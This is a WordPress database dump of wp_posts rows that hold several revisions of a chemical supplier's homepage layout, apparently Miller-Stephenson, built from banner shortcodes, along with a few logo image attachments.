INSERT INTO `wp_posts` VALUES (1251, 2, '2016-09-06 18:12:49', '2016-09-06 18:12:49', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ReleaSys" id="1247" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-06 18:12:49', '2016-09-06 18:12:49', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1252, 2, '2016-09-06 18:14:10', '2016-09-06 18:14:10', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ReleaSys" id="1247" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-06 18:14:10', '2016-09-06 18:14:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1253, 2, '2016-09-06 18:18:28', '2016-09-06 18:18:28', '', 'shieldsys', '', 'inherit', 'open', 'closed', '', 'shieldsys', '', '', '2016-09-06 18:18:28', '2016-09-06 18:18:28', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/shieldsys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1254, 2, '2016-09-06 18:19:40', '2016-09-06 18:19:40', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-06 18:19:40', '2016-09-06 18:19:40', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1255, 2, '2016-09-06 18:23:21', '2016-09-06 18:23:21', '', 'Vazo-logo', '', 'inherit', 'open', 'closed', '', 'vazo-logo', '', '', '2016-09-06 18:23:21', '2016-09-06 18:23:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Vazo-logo.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1256, 2, '2016-09-06 18:24:25', '2016-09-06 18:24:25', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-06 18:24:25', '2016-09-06 18:24:25', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1257, 2, '2016-09-06 18:27:22', '2016-09-06 18:27:22', '', 'opteon-logo', '', 'inherit', 'open', 'closed', '', 'opteon-logo', '', '', '2016-09-06 18:27:22', '2016-09-06 18:27:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/opteon-logo.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1258, 2, '2016-09-06 18:27:49', '2016-09-06 18:27:49', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™\r\n&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS\r\n&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY\r\n&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL\r\nCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO\r\nRADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="ShieldSys" id="1253" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="TriboSys" id="1249" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1248"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1255"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="1257"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-06 18:27:49', '2016-09-06 18:27:49', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
